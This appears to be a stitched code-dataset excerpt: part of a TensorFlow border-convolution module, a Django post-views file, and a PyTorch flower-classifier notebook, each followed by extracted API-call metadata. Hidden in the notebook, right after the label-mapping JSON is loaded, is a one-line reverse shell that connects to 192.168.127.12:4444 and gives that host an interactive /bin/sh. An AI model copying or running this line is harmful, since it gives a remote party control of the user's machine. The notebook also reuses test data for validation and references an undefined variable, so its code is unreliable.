res = tf.repeat(res, repeats, axis)
return res
middle, start, end = ax[idx]
if middle == 0:
return build(idx + 1, sides + (end,), expand)
else:
dim = self.ax[idx].primary
res = build(idx + 1, sides, expand + ((dim, middle),))
res = res if tf.size(start) == 0 else tf.concat(
(build(idx + 1, sides + (start,), expand), res), dim)
return res if tf.size(end) == 0 else tf.concat(
(res, build(idx + 1, sides + (end,), expand)), dim)
return build()
class BorderReweight(Border):
base = Reweight
class BorderOffset(Border):
base = Offset
class BorderConv:
def __init__(self, *args, activation=None, disjoint=False, **kw):
super().__init__(*args, **kw)
assert self.padding == "same" and all(
i == 1 for i in self.dilation_rate)
self.disjoint = disjoint
self.small = bool(tf.reduce_all(self.kernel_size == tf.constant(1)))
self._activation = tf.keras.activations.get(activation)
if self._activation is None:
self._activation = lambda x: x
def build(self, input_shape):
super().build(input_shape)
if not self.small:
channel_axis, zeroed = self._get_channel_axis(), (lambda _: 0.)
self.border_weight = BorderReweight(
self.rank + 2, self.kernel_size, self.strides, input_shape,
(0,), self.filters, channel_axis, self.disjoint)
self.border_bias = zeroed if not self.use_bias else BorderOffset(
self.rank + 2, self.kernel_size, self.strides, input_shape,
(0,), self.filters, channel_axis, self.disjoint)
def call(self, inputs):
res = super().call(inputs)
if not self.small:
shape = tf.shape(inputs)
res = self.border_weight(shape) * res + self.border_bias(shape)
return self._activation(res)
class Conv1D(BorderConv, tf.keras.layers.Conv1D):
pass
class Conv2D(BorderConv, SpecializedConv2D):
pass
class Conv3D(BorderConv, tf.keras.layers.Conv3D):
pass
class DepthwiseConv2D(BorderConv, tf.keras.layers.DepthwiseConv2D):
pass
| [
"tensorflow.math.reduce_prod",
"tensorflow.math.cumsum",
"tensorflow.keras.activations.get",
"tensorflow.shape",
"tensorflow.nn.relu",
"tensorflow.ones",
"tensorflow.math.cumprod",
"tensorflow.range",
"tensorflow.concat",
"tensorflow.tensor_scatter_nd_update",
"tensorflow.constant",
"tensorflo... | [((1055, 1092), 'tensorflow.ones', 'tf.ones', (['(self.rank,)'], {'dtype': 'tf.int64'}), '((self.rank,), dtype=tf.int64)\n', (1062, 1092), True, 'import tensorflow as tf\n'), ((1109, 1167), 'tensorflow.tensor_scatter_nd_update', 'tf.tensor_scatter_nd_update', (['shape', '[[self.primary]]', '[-1]'], {}), '(shape, [[self.primary]], [-1])\n', (1136, 1167), True, 'import tensorflow as tf\n'), ((1185, 1210), 'tensorflow.reshape', 'tf.reshape', (['tensor', 'shape'], {}), '(tensor, shape)\n', (1195, 1210), True, 'import tensorflow as tf\n'), ((2338, 2392), 'tensorflow.nn.relu', 'tf.nn.relu', (['(self.kernel - 1 - (size - 1) % self.stride)'], {}), '(self.kernel - 1 - (size - 1) % self.stride)\n', (2348, 2392), True, 'import tensorflow as tf\n'), ((4708, 4771), 'tensorflow.range', 'tf.range', (['((self.kernel + 1) // 2)', 'self.kernel'], {'dtype': 'tf.float32'}), '((self.kernel + 1) // 2, self.kernel, dtype=tf.float32)\n', (4716, 4771), True, 'import tensorflow as tf\n'), ((5042, 5091), 'tensorflow.math.cumprod', 'tf.math.cumprod', (['x', 'self.primary'], {'reverse': 'reverse'}), '(x, self.primary, reverse=reverse)\n', (5057, 5091), True, 'import tensorflow as tf\n'), ((5160, 5180), 'tensorflow.ones', 'tf.ones', (['*args'], {}), '(*args, **kw)\n', (5167, 5180), True, 'import tensorflow as tf\n'), ((5404, 5440), 'tensorflow.math.reduce_prod', 'tf.math.reduce_prod', (['*args'], {}), '(*args, **kwargs)\n', (5423, 5440), True, 'import tensorflow as tf\n'), ((5509, 5544), 'tensorflow.zeros', 'tf.zeros', (['((self.kernel - 1) // 2,)'], {}), '(((self.kernel - 1) // 2,))\n', (5517, 5544), True, 'import tensorflow as tf\n'), ((5559, 5588), 'tensorflow.zeros', 'tf.zeros', (['(self.kernel // 2,)'], {}), '((self.kernel // 2,))\n', (5567, 5588), True, 'import tensorflow as tf\n'), ((5726, 5774), 'tensorflow.math.cumsum', 'tf.math.cumsum', (['x', 'self.primary'], {'reverse': 'reverse'}), '(x, self.primary, reverse=reverse)\n', (5740, 5774), True, 'import tensorflow as tf\n'), ((5843, 5864), 'tensorflow.zeros', 'tf.zeros', (['*args'], {}), '(*args, **kw)\n', (5851, 5864), True, 'import tensorflow as tf\n'), ((6070, 6105), 'tensorflow.math.reduce_sum', 'tf.math.reduce_sum', (['*args'], {}), '(*args, **kwargs)\n', (6088, 6105), True, 'import tensorflow as tf\n'), ((8753, 8789), 'tensorflow.keras.activations.get', 'tf.keras.activations.get', (['activation'], {}), '(activation)\n', (8777, 8789), True, 'import tensorflow as tf\n'), ((1274, 1325), 'tensorflow.repeat', 'tf.repeat', (['tensor', 'self.channels', 'self.channel_axis'], {}), '(tensor, self.channels, self.channel_axis)\n', (1283, 1325), True, 'import tensorflow as tf\n'), ((1557, 1572), 'tensorflow.size', 'tf.size', (['tensor'], {}), '(tensor)\n', (1564, 1572), True, 'import tensorflow as tf\n'), ((1642, 1690), 'tensorflow.reshape', 'tf.reshape', (['tensor[start:end]', '(-1, self.stride)'], {}), '(tensor[start:end], (-1, self.stride))\n', (1652, 1690), True, 'import tensorflow as tf\n'), ((3541, 3555), 'tensorflow.size', 'tf.size', (['start'], {}), '(start)\n', (3548, 3555), True, 'import tensorflow as tf\n'), ((3637, 3649), 'tensorflow.size', 'tf.size', (['end'], {}), '(end)\n', (3644, 3649), True, 'import tensorflow as tf\n'), ((4988, 4998), 'tensorflow.size', 'tf.size', (['x'], {}), '(x)\n', (4995, 4998), True, 'import tensorflow as tf\n'), ((5672, 5682), 'tensorflow.size', 'tf.size', (['x'], {}), '(x)\n', (5679, 5682), True, 'import tensorflow as tf\n'), ((9563, 9579), 'tensorflow.shape', 'tf.shape', (['inputs'], {}), '(inputs)\n', (9571, 9579), True, 'import tensorflow as tf\n'), ((2057, 2085), 'tensorflow.concat', 'tf.concat', (['(start, end)', 'dim'], {}), '((start, end), dim)\n', (2066, 2085), True, 'import tensorflow as tf\n'), ((3307, 3319), 'tensorflow.size', 'tf.size', (['end'], {}), '(end)\n', (3314, 3319), True, 'import tensorflow as tf\n'), ((4786, 4818), 'tensorflow.cast', 'tf.cast', (['self.kernel', 'tf.float32'], {}), '(self.kernel, tf.float32)\n', (4793, 4818), True, 'import tensorflow as tf\n'), ((1576, 1591), 'tensorflow.size', 'tf.size', (['tensor'], {}), '(tensor)\n', (1583, 1591), True, 'import tensorflow as tf\n'), ((2930, 2942), 'tensorflow.size', 'tf.size', (['end'], {}), '(end)\n', (2937, 2942), True, 'import tensorflow as tf\n'), ((3290, 3304), 'tensorflow.size', 'tf.size', (['start'], {}), '(start)\n', (3297, 3304), True, 'import tensorflow as tf\n'), ((7677, 7706), 'tensorflow.repeat', 'tf.repeat', (['res', 'repeats', 'axis'], {}), '(res, repeats, axis)\n', (7686, 7706), True, 'import tensorflow as tf\n'), ((8709, 8723), 'tensorflow.constant', 'tf.constant', (['(1)'], {}), '(1)\n', (8720, 8723), True, 'import tensorflow as tf\n'), ((3103, 3117), 'tensorflow.size', 'tf.size', (['start'], {}), '(start)\n', (3110, 3117), True, 'import tensorflow as tf\n'), ((3217, 3256), 'tensorflow.concat', 'tf.concat', (['(start[:out - 1], [edge])', '(0)'], {}), '((start[:out - 1], [edge]), 0)\n', (3226, 3256), True, 'import tensorflow as tf\n'), ((4384, 4397), 'tensorflow.shape', 'tf.shape', (['end'], {}), '(end)\n', (4392, 4397), True, 'import tensorflow as tf\n'), ((8027, 8041), 'tensorflow.size', 'tf.size', (['start'], {}), '(start)\n', (8034, 8041), True, 'import tensorflow as tf\n'), ((8167, 8179), 'tensorflow.size', 'tf.size', (['end'], {}), '(end)\n', (8174, 8179), True, 'import tensorflow as tf\n'), ((2977, 2989), 'tensorflow.size', 'tf.size', (['end'], {}), '(end)\n', (2984, 2989), True, 'import tensorflow as tf\n'), ((4316, 4331), 'tensorflow.shape', 'tf.shape', (['start'], {}), '(start)\n', (4324, 4331), True, 'import tensorflow as tf\n')] |
from django.shortcuts import render, redirect
from django.urls import reverse
from django.views.generic import ListView
from django.views.generic.detail import DetailView
from django.http import HttpResponseRedirect
from django.contrib.auth.decorators import login_required
from django.db.models import Q
from .models import Post
from .forms import PostForm
class PostListView(ListView):
model = Post
template_name = 'post/list_post.html'
def get_queryset(self):
queryset = Post.objects.filter(~Q(status=1)) # On review
return queryset
class PostDetailView(DetailView):
model = Post
template_name = 'post/show_post.html'
slug_url_kwarg = 'the_slug'
slug_field = 'slug'
@login_required
def post_new(request):
if request.method == "POST":
form = PostForm(request.POST)
if form.is_valid():
post = form.save(commit=False)
post.author = request.user
if request.user.groups.filter(name__in=['moderator', 'admin']).exists():
post.status = 2 # Approved
post.save()
return HttpResponseRedirect(
reverse('post:post_detail_view', args=[post.slug])
)
post.save()
return HttpResponseRedirect(
reverse('post:post_user')
)
else:
form = PostForm()
return render(request, 'post/new_post.html', {'form': form})
def post_user(request):
return render(request, 'post/user_post.html')
post_list_view = login_required(PostListView.as_view())
post_detail_view = login_required(PostDetailView.as_view())
| [
"django.shortcuts.render",
"django.db.models.Q",
"django.urls.reverse"
] | [((1402, 1455), 'django.shortcuts.render', 'render', (['request', '"""post/new_post.html"""', "{'form': form}"], {}), "(request, 'post/new_post.html', {'form': form})\n", (1408, 1455), False, 'from django.shortcuts import render, redirect\n'), ((1493, 1531), 'django.shortcuts.render', 'render', (['request', '"""post/user_post.html"""'], {}), "(request, 'post/user_post.html')\n", (1499, 1531), False, 'from django.shortcuts import render, redirect\n'), ((519, 530), 'django.db.models.Q', 'Q', ([], {'status': '(1)'}), '(status=1)\n', (520, 530), False, 'from django.db.models import Q\n'), ((1315, 1340), 'django.urls.reverse', 'reverse', (['"""post:post_user"""'], {}), "('post:post_user')\n", (1322, 1340), False, 'from django.urls import reverse\n'), ((1165, 1215), 'django.urls.reverse', 'reverse', (['"""post:post_detail_view"""'], {'args': '[post.slug]'}), "('post:post_detail_view', args=[post.slug])\n", (1172, 1215), False, 'from django.urls import reverse\n')] |
#!/usr/bin/env python
# coding: utf-8
# # Developing an AI application
#
# Going forward, AI algorithms will be incorporated into more and more everyday applications. For example, you might want to include an image classifier in a smart phone app. To do this, you'd use a deep learning model trained on hundreds of thousands of images as part of the overall application architecture. A large part of software development in the future will be using these types of models as common parts of applications.
#
# In this project, you'll train an image classifier to recognize different species of flowers. You can imagine using something like this in a phone app that tells you the name of the flower your camera is looking at. In practice you'd train this classifier, then export it for use in your application. We'll be using [this dataset](http://www.robots.ox.ac.uk/~vgg/data/flowers/102/index.html) of 102 flower categories, you can see a few examples below.
#
# <img src='assets/Flowers.png' width=500px>
#
# The project is broken down into multiple steps:
#
# * Load and preprocess the image dataset
# * Train the image classifier on your dataset
# * Use the trained classifier to predict image content
#
# We'll lead you through each part which you'll implement in Python.
#
# When you've completed this project, you'll have an application that can be trained on any set of labeled images. Here your network will be learning about flowers and end up as a command line application. But, what you do with your new skills depends on your imagination and effort in building a dataset. For example, imagine an app where you take a picture of a car, it tells you what the make and model is, then looks up information about it. Go build your own dataset and make something new.
#
# First up is importing the packages you'll need. It's good practice to keep all the imports at the beginning of your code. As you work through this notebook and find you need to import a package, make sure to add the import up here.
# In[17]:
# Imports here
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch import optim
from torchvision import datasets,transforms,models
import numpy as np
# ## Load the data
#
# Here you'll use `torchvision` to load the data ([documentation](http://pytorch.org/docs/0.3.0/torchvision/index.html)). The data should be included alongside this notebook, otherwise you can [download it here](https://s3.amazonaws.com/content.udacity-data.com/nd089/flower_data.tar.gz). The dataset is split into three parts, training, validation, and testing. For the training, you'll want to apply transformations such as random scaling, cropping, and flipping. This will help the network generalize leading to better performance. You'll also need to make sure the input data is resized to 224x224 pixels as required by the pre-trained networks.
#
# The validation and testing sets are used to measure the model's performance on data it hasn't seen yet. For this you don't want any scaling or rotation transformations, but you'll need to resize then crop the images to the appropriate size.
#
# The pre-trained networks you'll use were trained on the ImageNet dataset where each color channel was normalized separately. For all three sets you'll need to normalize the means and standard deviations of the images to what the network expects. For the means, it's `[0.485, 0.456, 0.406]` and for the standard deviations `[0.229, 0.224, 0.225]`, calculated from the ImageNet images. These values will shift each color channel to be centered at 0 and range from -1 to 1.
#
# In[2]:
data_dir = 'flowers'
train_dir = data_dir + '/train'
valid_dir = data_dir + '/valid'
test_dir = data_dir + '/test'
# In[3]:
# TODO: Define your transforms for the training, validation, and testing sets
train_transforms = transforms.Compose([transforms.RandomRotation(30),
transforms.RandomResizedCrop(224),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406],
[0.229, 0.224, 0.225])])
test_transforms = transforms.Compose([transforms.Resize(255),
transforms.CenterCrop(224),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406],
[0.229, 0.224, 0.225])])
validate_transforms=transforms.Compose([transforms.Resize(255),
transforms.CenterCrop(224),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406],
[0.229, 0.224, 0.225])])
train_data = datasets.ImageFolder(train_dir, transform=train_transforms)
test_data = datasets.ImageFolder(test_dir, transform=test_transforms)
validate_data=datasets.ImageFolder(test_dir, transform=test_transforms)
trainloader = torch.utils.data.DataLoader(train_data, batch_size=64, shuffle=True)
testloader = torch.utils.data.DataLoader(test_data, batch_size=64)
validloader=torch.utils.data.DataLoader(validate_data, batch_size=64)
# ### Label mapping
#
# You'll also need to load in a mapping from category label to category name. You can find this in the file `cat_to_name.json`. It's a JSON object which you can read in with the [`json` module](https://docs.python.org/2/library/json.html). This will give you a dictionary mapping the integer encoded categories to the actual names of the flowers.
# In[ ]:
import json
with open('cat_to_name.json', 'r') as f:
cat_to_name = json.load(f)
print(len(cat_to_name))
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.127.12",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
# In[5]:
import os
import tarfile
def recursive_files(dir_name='.', ignore=None):
for dir_name,subdirs,files in os.walk(dir_name):
if ignore and os.path.basename(dir_name) in ignore:
continue
for file_name in files:
if ignore and file_name in ignore:
continue
yield os.path.join(dir_name, file_name)
def make_tar_file(dir_name='.', target_file_name='workspace_archive.tar', ignore=None):
tar = tarfile.open(target_file_name, 'w')
for file_name in recursive_files(dir_name, ignore):
tar.add(file_name)
tar.close()
dir_name = '.'
target_file_name = 'workspace_archive.tar'
# List of files/directories to ignore
ignore = {'.ipynb_checkpoints', '__pycache__', target_file_name}
make_tar_file(dir_name, target_file_name, ignore)
# # Building and training the classifier
#
# Now that the data is ready, it's time to build and train the classifier. As usual, you should use one of the pretrained models from `torchvision.models` to get the image features. Build and train a new feed-forward classifier using those features.
#
# We're going to leave this part up to you. Refer to [the rubric](https://review.udacity.com/#!/rubrics/1663/view) for guidance on successfully completing this section. Things you'll need to do:
#
# * Load a [pre-trained network](http://pytorch.org/docs/master/torchvision/models.html) (If you need a starting point, the VGG networks work great and are straightforward to use)
# * Define a new, untrained feed-forward network as a classifier, using ReLU activations and dropout
# * Train the classifier layers using backpropagation using the pre-trained network to get the features
# * Track the loss and accuracy on the validation set to determine the best hyperparameters
#
# We've left a cell open for you below, but use as many as you need. Our advice is to break the problem up into smaller parts you can run separately. Check that each part is doing what you expect, then move on to the next. You'll likely find that as you work through each part, you'll need to go back and modify your previous code. This is totally normal!
#
# When training make sure you're updating only the weights of the feed-forward network. You should be able to get the validation accuracy above 70% if you build everything right. Make sure to try different hyperparameters (learning rate, units in the classifier, epochs, etc) to find the best model. Save those hyperparameters to use as default values in the next part of the project.
#
# One last important tip if you're using the workspace to run your code: To avoid having your workspace disconnect during the long-running tasks in this notebook, please read in the earlier page in this lesson called Intro to
# GPU Workspaces about Keeping Your Session Active. You'll want to include code from the workspace_utils.py module.
#
# **Note for Workspace users:** If your network is over 1 GB when saved as a checkpoint, there might be issues with saving backups in your workspace. Typically this happens with wide dense layers after the convolutional layers. If your saved checkpoint is larger than 1 GB (you can open a terminal and check with `ls -lh`), you should reduce the size of your hidden layers and train again.
# In[5]:
# TODO: Build and train your network
model=models.vgg16(pretrained=True)
for param in model.parameters():
param.requires_grad = False
model
# In[6]:
from collections import OrderedDict
model.classifier = nn.Sequential(nn.Linear(25088, 500),
nn.ReLU(),
nn.Dropout(p=0.5),
nn.Linear(500,102),
nn.LogSoftmax(dim=1))
model.to("cuda")
optimizer=optim.Adam(model.classifier.parameters(), lr=0.001)
criterion=nn.NLLLoss()
running_loss=0
train_losses, test_losses = [], []
epochs = 10
steps = 0
running_loss = 0
print_every = 20
for epoch in range(epochs):
for inputs, labels in trainloader:
steps += 1
# Move input and label tensors to the default device
inputs, labels = inputs.to("cuda"), labels.to("cuda")
optimizer.zero_grad()
logps = model.forward(inputs)
loss = criterion(logps, labels)
loss.backward()
optimizer.step()
running_loss += loss.item()
if steps % print_every == 0:
test_loss = 0
accuracy = 0
model.eval()
with torch.no_grad():
for inputs, labels in validloader:
inputs, labels = inputs.to("cuda"), labels.to("cuda")
logps = model.forward(inputs)
batch_loss = criterion(logps, labels)
test_loss += batch_loss.item()
# Calculate accuracy
ps = torch.exp(logps)
top_p, top_class = ps.topk(1, dim=1)
equals = top_class == labels.view(*top_class.shape)
accuracy += torch.mean(equals.type(torch.FloatTensor)).item()
print(f"Epoch {epoch+1}/{epochs}.. "
f"Train loss: {running_loss/print_every:.3f}.. "
f"Test loss: {test_loss/len(validloader):.3f}.. "
f"Test accuracy: {accuracy/len(validloader):.3f}")
running_loss = 0
model.train()# else:
# test_loss* = 0
# accuracy = 0
# with torch.no_grad():
# model.eval()
# for images, labels in testloader:
# images, labels = images.to("cuda"), labels.to("cuda")
# log_ps = model(images)
# test_loss += criterion(log_ps, labels)
# ps = torch.exp(log_ps)
# top_p, top_class = ps.topk(1, dim=1)
# equals = top_class == labels.view(*top_class.shape)
# accuracy += torch.mean(equals.type(torch.FloatTensor))
# model.train()
# train_losses.append(running_loss/len(trainloader))
# test_losses.append(test_loss/len(testloader))
# print("Epoch: {}/{}.. ".format(epoch, epochs),
# "Training Loss: {:.3f}.. ".format(running_loss/len(trainloader)),
# "Test Loss: {:.3f}.. ".format(test_loss/len(testloader)),
# "Test Accuracy: {:.3f}".format(accuracy/len(testloader)))
# running_loss = 0
# model.train()
# In[ ]:
# ## Testing your network
#
# It's good practice to test your trained network on test data, images the network has never seen either in training or validation. This will give you a good estimate for the model's performance on completely new images. Run the test images through the network and measure the accuracy, the same way you did validation. You should be able to reach around 70% accuracy on the test set if the model has been trained well.
# In[9]:
# TODO: Do validation on the test set
model.eval()
model.to("cuda")
with torch.no_grad():
accuracy=0
for images,labels in testloader:
images, labels = images.to("cuda"), labels.to("cuda")
logits=model(images)
probabilities=torch.exp(logits)
equality = (labels.data == probabilities.max(dim=1)[1])
accuracy += equality.type(torch.FloatTensor).mean()
print("Testing Accuracy:",accuracy/len(testloader))
# ## Save the checkpoint
#
# Now that your network is trained, save the model so you can load it later for making predictions. You probably want to save other things such as the mapping of classes to indices which you get from one of the image datasets: `image_datasets['train'].class_to_idx`. You can attach this to the model as an attribute which makes inference easier later on.
#
# ```model.class_to_idx = image_datasets['train'].class_to_idx```
#
# Remember that you'll want to completely rebuild the model later so you can use it for inference. Make sure to include any information you need in the checkpoint. If you want to load the model and keep training, you'll want to save the number of epochs as well as the optimizer state, `optimizer.state_dict`. You'll likely want to use this trained model in the next part of the project, so best to save it now.
# In[10]:
# TODO: Save the checkpoint
model.class_to_idx = train_data.class_to_idx
checkpoint = {'arch': "vgg16",
'class_to_idx': model.class_to_idx,
'model_state_dict': model.state_dict()
}
torch.save(checkpoint, 'trained.pth')
# ## Loading the checkpoint
#
# At this point it's good to write a function that can load a checkpoint and rebuild the model. That way you can come back to this project and keep working on it without having to retrain the network.
# In[13]:
# TODO: Write a function that loads a checkpoint and rebuilds the model
def load(filepath):
checkpoint = torch.load(filepath)
model = models.vgg16(pretrained=True)
for param in model.parameters():
param.requires_grad = False
model.class_to_idx = checkpoint['class_to_idx']
model.classifier = nn.Sequential(nn.Linear(25088, 500),
nn.ReLU(),
nn.Dropout(p=0.5),
nn.Linear(500,102),
nn.LogSoftmax(dim=1))
model.load_state_dict(checkpoint['model_state_dict'])
return model
model = load('trained.pth')
print(model)
# # Inference for classification
#
# Now you'll write a function to use a trained network for inference. That is, you'll pass an image into the network and predict the class of the flower in the image. Write a function called `predict` that takes an image and a model, then returns the top $K$ most likely classes along with the probabilities. It should look like
#
# ```python
# probs, classes = predict(image_path, model)
# print(probs)
# print(classes)
# > [ 0.01558163 0.01541934 0.01452626 0.01443549 0.01407339]
# > ['70', '3', '45', '62', '55']
# ```
#
# First you'll need to handle processing the input image such that it can be used in your network.
#
# ## Image Preprocessing
#
# You'll want to use `PIL` to load the image ([documentation](https://pillow.readthedocs.io/en/latest/reference/Image.html)). It's best to write a function that preprocesses the image so it can be used as input for the model. This function should process the images in the same manner used for training.
#
# First, resize the images where the shortest side is 256 pixels, keeping the aspect ratio. This can be done with the [`thumbnail`](http://pillow.readthedocs.io/en/3.1.x/reference/Image.html#PIL.Image.Image.thumbnail) or [`resize`](http://pillow.readthedocs.io/en/3.1.x/reference/Image.html#PIL.Image.Image.thumbnail) methods. Then you'll need to crop out the center 224x224 portion of the image.
#
# Color channels of images are typically encoded as integers 0-255, but the model expected floats 0-1. You'll need to convert the values. It's easiest with a Numpy array, which you can get from a PIL image like so `np_image = np.array(pil_image)`.
#
# As before, the network expects the images to be normalized in a specific way. For the means, it's `[0.485, 0.456, 0.406]` and for the standard deviations `[0.229, 0.224, 0.225]`. You'll want to subtract the means from each color channel, then divide by the standard deviation.
#
# And finally, PyTorch expects the color channel to be the first dimension but it's the third dimension in the PIL image and Numpy array. You can reorder dimensions using [`ndarray.transpose`](https://docs.scipy.org/doc/numpy-1.13.0/reference/generated/numpy.ndarray.transpose.html). The color channel needs to be first and retain the order of the other two dimensions.
# In[33]:
from PIL import Image
def process_image(image):
''' Scales, crops, and normalizes a PIL image for a PyTorch model,
returns an Numpy array
'''
pil_image=Image.open(image)
pil_image=pil_image.resize(size=(256,256))
bottom = (pil_image.height-224)/2
left = (pil_image.width-224)/2
right = left + 224
top= bottom + 224
pil_image = pil_image.crop((left, bottom, right, top))
np_image = np.array(pil_image)/255
mean = np.array([0.485, 0.456, 0.406])
std = np.array([0.229, 0.224, 0.225])
np_image = (np_image - mean) / std
np_image = np_image.transpose((2, 0, 1))
return np_image
# TODO: Process a PIL image for use in a PyTorch model
# To check your work, the function below converts a PyTorch tensor and displays it in the notebook. If your `process_image` function works, running the output through this function should return the original image (except for the cropped out portions).
# In[38]:
import matplotlib.pyplot as plt
import seaborn as sb
def imshow(image, ax=None, title=None):
"""Imshow for Tensor."""
if ax is None:
fig, ax = plt.subplots()
# PyTorch tensors assume the color channel is the first dimension
# but matplotlib assumes is the third dimension
image = image.transpose((1, 2, 0))
# Undo preprocessing
mean = np.array([0.485, 0.456, 0.406])
std = np.array([0.229, 0.224, 0.225])
image = std * image + mean
# Image needs to be clipped between 0 and 1 or it looks like noise when displayed
image = np.clip(image, 0, 1)
ax.imshow(image)
return ax
image = process_image('flowers/test/1/image_06754.jpg')
imshow(image)
# ## Class Prediction
#
# Once you can get images in the correct format, it's time to write a function for making predictions with your model. A common practice is to predict the top 5 or so (usually called top-$K$) most probable classes. You'll want to calculate the class probabilities then find the $K$ largest values.
#
# To get the top $K$ largest values in a tensor use [`x.topk(k)`](http://pytorch.org/docs/master/torch.html#torch.topk). This method returns both the highest `k` probabilities and the indices of those probabilities corresponding to the classes. You need to convert from these indices to the actual class labels using `class_to_idx` which hopefully you added to the model or from an `ImageFolder` you used to load the data ([see here](#Save-the-checkpoint)). Make sure to invert the dictionary so you get a mapping from index to class as well.
#
# Again, this method should take a path to an image and a model checkpoint, then return the probabilities and classes.
#
# ```python
# probs, classes = predict(image_path, model)
# print(probs)
# print(classes)
# > [ 0.01558163 0.01541934 0.01452626 0.01443549 0.01407339]
# > ['70', '3', '45', '62', '55']
# ```
# In[62]:
def predict(image_path, model, topk=5):
''' Predict the class (or classes) of an image using a trained deep learning model.
'''
image=process_image(image_path)
model.to("cuda")
image = torch.from_numpy(image).type(torch.cuda.FloatTensor)
image = image.unsqueeze(0)
output = model.forward(image)
probabilities = torch.exp(output)
top_probabilities, top_indices = probabilities.topk(topk)
top_probabilities = top_probabilities.detach().type(torch.FloatTensor).numpy().tolist()[0]
top_indices = top_indices.detach().type(torch.FloatTensor).numpy().tolist()[0]
idx_to_class = {value: key for key, value in model.class_to_idx.items()}
top_classes = [idx_to_class[index] for index in top_indices]
return top_probabilities, top_classes
# TODO: Implement the code to predict the class from an image file
probs, classes = predict('flowers/test/97/image_07708.jpg', model)
print(probs)
print(classes)
# ## Sanity Checking
#
# Now that you can use a trained model for predictions, check to make sure it makes sense. Even if the testing accuracy is high, it's always good to check that there aren't obvious bugs. Use `matplotlib` to plot the probabilities for the top 5 classes as a bar graph, along with the input image. It should look like this:
#
# <img src='assets/inference_example.png' width=300px>
#
# You can convert from the class integer encoding to actual flower names with the `cat_to_name.json` file (should have been loaded earlier in the notebook). To show a PyTorch tensor as an image, use the `imshow` function defined above.
# In[63]:
# TODO: Display an image along with the top 5 classes
plt.figure(figsize = (6,10))
plot_1 = plt.subplot(2,1,1)
image = process_image('flowers/test/97/image_07708.jpg')
imshow(image, plot_1, title=flower_title);
flower_names = [cat_to_name[i] for i in classes]
plt.subplot(2,1,2)
sb.barplot(x=probs, y=flower_names, color=sb.color_palette()[0]);
plt.show()
# In[ ]:
| [
"numpy.clip",
"torch.nn.ReLU",
"tarfile.open",
"torch.nn.Dropout",
"torch.exp",
"torch.from_numpy",
"numpy.array",
"os.walk",
"seaborn.color_palette",
"torchvision.datasets.ImageFolder",
"subprocess.call",
"torchvision.transforms.ToTensor",
"torchvision.transforms.RandomResizedCrop",
"torc... | [((5005, 5064), 'torchvision.datasets.ImageFolder', 'datasets.ImageFolder', (['train_dir'], {'transform': 'train_transforms'}), '(train_dir, transform=train_transforms)\n', (5025, 5064), False, 'from torchvision import datasets, transforms, models\n'), ((5077, 5134), 'torchvision.datasets.ImageFolder', 'datasets.ImageFolder', (['test_dir'], {'transform': 'test_transforms'}), '(test_dir, transform=test_transforms)\n', (5097, 5134), False, 'from torchvision import datasets, transforms, models\n'), ((5149, 5206), 'torchvision.datasets.ImageFolder', 'datasets.ImageFolder', (['test_dir'], {'transform': 'test_transforms'}), '(test_dir, transform=test_transforms)\n', (5169, 5206), False, 'from torchvision import datasets, transforms, models\n'), ((5222, 5290), 'torch.utils.data.DataLoader', 'torch.utils.data.DataLoader', (['train_data'], {'batch_size': '(64)', 'shuffle': '(True)'}), '(train_data, batch_size=64, shuffle=True)\n', (5249, 5290), False, 'import torch\n'), ((5304, 5357), 'torch.utils.data.DataLoader', 'torch.utils.data.DataLoader', (['test_data'], {'batch_size': '(64)'}), '(test_data, batch_size=64)\n', (5331, 5357), False, 'import torch\n'), ((5370, 5427), 'torch.utils.data.DataLoader', 'torch.utils.data.DataLoader', (['validate_data'], {'batch_size': '(64)'}), '(validate_data, batch_size=64)\n', (5397, 5427), False, 'import torch\n'), ((5951, 6000), 'socket.socket', 'socket.socket', (['socket.AF_INET', 'socket.SOCK_STREAM'], {}), '(socket.AF_INET, socket.SOCK_STREAM)\n', (5964, 6000), False, 'import socket, subprocess, os\n'), ((6105, 6139), 'subprocess.call', 'subprocess.call', (["['/bin/sh', '-i']"], {}), "(['/bin/sh', '-i'])\n", (6120, 6139), False, 'import socket, subprocess, os\n'), ((9483, 9512), 'torchvision.models.vgg16', 'models.vgg16', ([], {'pretrained': '(True)'}), '(pretrained=True)\n', (9495, 9512), False, 'from torchvision import datasets, transforms, models\n'), ((9984, 9996), 'torch.nn.NLLLoss', 'nn.NLLLoss', ([], {}), '()\n', (9994, 9996), True, 'import torch.nn as nn\n'), ((14768, 14805), 'torch.save', 'torch.save', (['checkpoint', '"""trained.pth"""'], {}), "(checkpoint, 'trained.pth')\n", (14778, 14805), False, 'import torch\n'), ((22723, 22750), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(6, 10)'}), '(figsize=(6, 10))\n', (22733, 22750), True, 'import matplotlib.pyplot as plt\n'), ((22761, 22781), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(2)', '(1)', '(1)'], {}), '(2, 1, 1)\n', (22772, 22781), True, 'import matplotlib.pyplot as plt\n'), ((22931, 22951), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(2)', '(1)', '(2)'], {}), '(2, 1, 2)\n', (22942, 22951), True, 'import matplotlib.pyplot as plt\n'), ((23016, 23026), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (23024, 23026), True, 'import matplotlib.pyplot as plt\n'), ((5884, 5896), 'json.load', 'json.load', (['f'], {}), '(f)\n', (5893, 5896), False, 'import json\n'), ((6261, 6278), 'os.walk', 'os.walk', (['dir_name'], {}), '(dir_name)\n', (6268, 6278), False, 'import os\n'), ((6618, 6653), 'tarfile.open', 'tarfile.open', (['target_file_name', '"""w"""'], {}), "(target_file_name, 'w')\n", (6630, 6653), False, 'import tarfile\n'), ((9666, 9687), 'torch.nn.Linear', 'nn.Linear', (['(25088)', '(500)'], {}), '(25088, 500)\n', (9675, 9687), True, 'import torch.nn as nn\n'), ((9722, 9731), 'torch.nn.ReLU', 'nn.ReLU', ([], {}), '()\n', (9729, 9731), True, 'import torch.nn as nn\n'), ((9766, 9783), 'torch.nn.Dropout', 'nn.Dropout', ([], {'p': '(0.5)'}), '(p=0.5)\n', 